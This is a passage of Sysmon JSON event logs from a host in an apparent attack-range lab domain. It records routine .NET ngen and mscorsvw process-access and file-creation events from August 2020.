08:05:39.116","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-0010F3600D00}","TargetProcessId":"4628","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7389,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.023\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010DD640D00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.023","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010DD640D00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7390,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.023\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010DD640D00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.023","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010DD640D00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7391,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.038\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010DD640D00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.038","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010DD640D00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7392,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 08:05:40.132\r\nProcessGuid: {41C8662E-2254-5F25-0000-0010DD640D00}\r\nProcessId: 4804\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12c4-0\\Microsoft.Workflow.Compiler.exe\r\nCreationUtcTime: 2020-08-01 08:05:40.132","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 08:05:40.132","ProcessGuid":"{41C8662E-2254-5F25-0000-0010DD640D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12c4-0\\Microsoft.Workflow.Compiler.exe","CreationUtcTime":"2020-08-01 08:05:40.132","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7393,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.163\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001071690D00}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.163","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001071690D00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7394,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.163\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001071690D00}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.163","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001071690D00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7395,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.179\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001071690D00}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.179","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001071690D00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7396,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.210\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-00101D6D0D00}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.210","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-00101D6D0D00}","TargetProcessId":"4716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\F